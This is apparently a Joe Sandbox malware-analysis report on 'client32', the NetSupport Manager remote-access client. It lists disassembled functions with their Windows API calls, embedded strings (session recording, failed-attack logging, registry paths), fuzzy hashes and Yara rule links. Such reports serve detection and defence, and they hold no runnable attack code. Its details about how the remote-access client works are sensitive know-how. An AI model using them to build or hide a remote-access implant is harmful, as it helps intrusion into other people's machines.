                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
                                                                                                                                                                                • String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
                                                                                                                                                                                • API String ID: 3054845645-718119679
                                                                                                                                                                                • Opcode ID: 6727d046edcdd92641cd9cab6f71fd2873fec6cde9d91bbdba6030ff5d9c07bd
                                                                                                                                                                                • Instruction ID: 97c658d0ff47ffb6e0b086364488060456d2f78afd94873c83fd0d8ea8d00dc5
                                                                                                                                                                                • Opcode Fuzzy Hash: 6727d046edcdd92641cd9cab6f71fd2873fec6cde9d91bbdba6030ff5d9c07bd
                                                                                                                                                                                • Instruction Fuzzy Hash: 9DB15A74B41625AFE316DBA0CD91FE9FB61FB84B19F004129FA15AB2C8E770B840C795
                                                                                                                                                                                Function 110EB540 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • wsprintfA.USER32 ref: 110EB5D8
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110EB632
                                                                                                                                                                                • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB646
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110EB64E
                                                                                                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                                                                                                                                • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,?), ref: 110EB6C8
                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?), ref: 110EB6D5
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?), ref: 110EB6DC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                                                                                                                • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                                                                                                                • API String ID: 3451743168-2289091950
                                                                                                                                                                                • Opcode ID: b64a7e224dd47492d8d3c474a613704c721cb57762627dde2a5fd10f25463215
                                                                                                                                                                                • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                                                                                                                                • Opcode Fuzzy Hash: b64a7e224dd47492d8d3c474a613704c721cb57762627dde2a5fd10f25463215
                                                                                                                                                                                • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                                                                                                                                Function 11121130 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 121windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(111EA9C8), ref: 11121139
                                                                                                                                                                                • _calloc.LIBCMT ref: 1112117D
                                                                                                                                                                                • _calloc.LIBCMT ref: 111211F5
                                                                                                                                                                                • _calloc.LIBCMT ref: 1112122F
                                                                                                                                                                                • GetDC.USER32(?), ref: 1112125D
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000026), ref: 11121272
                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 1112129B
                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 111212C1
                                                                                                                                                                                  • Part of subcall function 11113410: GetStockObject.GDI32(0000000D), ref: 11113429
                                                                                                                                                                                  • Part of subcall function 11113410: GetObjectA.GDI32(00000000,0000003C,?), ref: 11113436
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(SMALLE.FON), ref: 1111347C
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(SYMBOLE.FON), ref: 11113483
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(SERIFE.FON), ref: 1111348A
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(SSERIFE.FON), ref: 11113491
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(COURE.FON), ref: 11113498
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(VGASYS.FON), ref: 1111349F
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(VGAFIX.FON), ref: 111134A6
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(SMALLF.FON), ref: 111134AD
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(SYMBOLF.FON), ref: 111134B4
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(SERIFF.FON), ref: 111134BB
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(SSERIFF.FON), ref: 111134C2
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(COURF.FON), ref: 111134C9
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(8514SYS.FON), ref: 111134D0
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(8514FIX.FON), ref: 111134D7
                                                                                                                                                                                  • Part of subcall function 11113410: AddFontResourceA.GDI32(DOSAPP.FON), ref: 111134DE
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • SetStretchBltMode.GDI32(?,00000001), ref: 111212EF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FontResource$_calloc$CompatibleCreateObject$CapsDeviceIncrementInterlockedModeStockStretch__wcstoi64
                                                                                                                                                                                • String ID: ..\ctl32\Remote.cpp$Cachesize$ScaleToFitMode$View$idata->bmc.bmcache$idata->dcache [i]$idata->gcache$idata->gcache == NULL
                                                                                                                                                                                • API String ID: 3840126596-442042151
                                                                                                                                                                                • Opcode ID: 57edaec7dffbb0f6638575aa0004dcc456727862a2e14c37d7e5ea0f0a811d4c
                                                                                                                                                                                • Instruction ID: 4a6ba3cda13640f415398d687f6d98b9969b8ecf2fca59c1cd16218ffe6a1287
                                                                                                                                                                                • Opcode Fuzzy Hash: 57edaec7dffbb0f6638575aa0004dcc456727862a2e14c37d7e5ea0f0a811d4c
                                                                                                                                                                                • Instruction Fuzzy Hash: 0841F7B9B81B126BD320DB75EC46BDBF6E8AF55708F144428F59B96280F670B400CB51
                                                                                                                                                                                Function 11039410 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 126windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 1103944A
                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1103944F
                                                                                                                                                                                • _calloc.LIBCMT ref: 1103945C
                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000), ref: 11039490
                                                                                                                                                                                • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103949E
                                                                                                                                                                                • GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
                                                                                                                                                                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
                                                                                                                                                                                • UpdateWindow.USER32(00000000), ref: 11039567
                                                                                                                                                                                • BringWindowToTop.USER32(?), ref: 1103956E
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                  • Part of subcall function 1115FFC0: SetForegroundWindow.USER32(00000000), ref: 1115FFEE
                                                                                                                                                                                • MessageBeep.USER32(000000FF), ref: 1103957F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
                                                                                                                                                                                • String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
                                                                                                                                                                                • API String ID: 4191401721-1182766118
                                                                                                                                                                                • Opcode ID: 652a91b2098379b02605fe8d5069c05963b9e2b73bb005911f99248933cbc35e
                                                                                                                                                                                • Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
                                                                                                                                                                                • Opcode Fuzzy Hash: 652a91b2098379b02605fe8d5069c05963b9e2b73bb005911f99248933cbc35e
                                                                                                                                                                                • Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759
                                                                                                                                                                                Function 11003650 Relevance: 27.2, APIs: 18, Instructions: 171COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSysColor.USER32(00000004), ref: 11003691
                                                                                                                                                                                  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                                                                                                                  • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                                                                                                                  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 110036A5
                                                                                                                                                                                • GetStockObject.GDI32(00000007), ref: 110036B0
                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 110036BB
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 110036CC
                                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 110036DC
                                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 110036F3
                                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 1100370A
                                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 11003721
                                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 1100373E
                                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 11003755
                                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 1100376C
                                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 11003783
                                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 110037A0
                                                                                                                                                                                • Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 110037CE
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 110037D8
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110037DE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3698065672-0
                                                                                                                                                                                • Opcode ID: 2329ccacc84faccda3082ed3dc7b209ee0a6c20b4be4e51e1785cab48f60eb6a
                                                                                                                                                                                • Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
                                                                                                                                                                                • Opcode Fuzzy Hash: 2329ccacc84faccda3082ed3dc7b209ee0a6c20b4be4e51e1785cab48f60eb6a
                                                                                                                                                                                • Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1
                                                                                                                                                                                Function 1104B7F0 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 229timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLocalTime.KERNEL32(?,FailedAttacks,00000001,FailedAttacks,00000000,80000002,Software\Productive Computer Insight\Client32,0002001F,00000000,00000000,?,?,?,2520CF5D), ref: 1104B8F6
                                                                                                                                                                                • _sprintf.LIBCMT ref: 1104B923
                                                                                                                                                                                  • Part of subcall function 110ED9F0: RegSetValueExA.ADVAPI32(80000003,?,00000000,11133BF3,80000002,80000004,00000000,00000000,?,?,110EDD64,11133BF3,?,00000001,?,80000002), ref: 110EDA19
                                                                                                                                                                                • _strncpy.LIBCMT ref: 1104BACE
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastLocalMessageProcessTimeValue_sprintf_strncpywsprintf
                                                                                                                                                                                • String ID: @ %s$%04d/%02d/%02d %02d:%02d:%02d$%s, %d$*** Warning. Failed Attack %u, from %s, at %s$FailedAttacks$Info. Connection Rejected, reason=%d$IsA()$LastAttack$LastAttacker$NC-$Software\Productive Computer Insight\Client32$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                • API String ID: 3341947355-3231647555
                                                                                                                                                                                • Opcode ID: 3dbe2756a17f6b1f6629c38a075b4d03cf034b88f41444ca10d1ba3fd67806bf
                                                                                                                                                                                • Instruction ID: fe029f2b4bd5101e4da145cc81d4ac0798fef8b5c75ba173e470820e68b704ff
                                                                                                                                                                                • Opcode Fuzzy Hash: 3dbe2756a17f6b1f6629c38a075b4d03cf034b88f41444ca10d1ba3fd67806bf
                                                                                                                                                                                • Instruction Fuzzy Hash: 34916075E00219AFEB10CFA9CC84FEEFBB4EF45704F148199E549A7281EB716A44CB61
                                                                                                                                                                                Function 11047010 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 214COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _calloc.LIBCMT ref: 1104702F
                                                                                                                                                                                • wsprintfA.USER32 ref: 110470AE
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • wsprintfA.USER32 ref: 110470E9
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                                                                                                                                • _strrchr.LIBCMT ref: 1104720C
                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                                                                                                                                • _free.LIBCMT ref: 11047251
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                                                                                                                                • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                                                                                                                                • API String ID: 1757445300-1785190265
                                                                                                                                                                                • Opcode ID: e2bb0366abd17725c6742a6d861dee297694f0bb14f26c2aec48bf96d63f98af
                                                                                                                                                                                • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                                                                                                                                • Opcode Fuzzy Hash: e2bb0366abd17725c6742a6d861dee297694f0bb14f26c2aec48bf96d63f98af
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                                                                                                                                Function 110CB450 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 117registryclipboardCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                                                                                                                                • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
                                                                                                                                                                                • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
                                                                                                                                                                                • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
                                                                                                                                                                                • RegisterClassExA.USER32(?), ref: 110CB4F2
                                                                                                                                                                                • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
                                                                                                                                                                                • RegisterClassExA.USER32(?), ref: 110CB58C
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
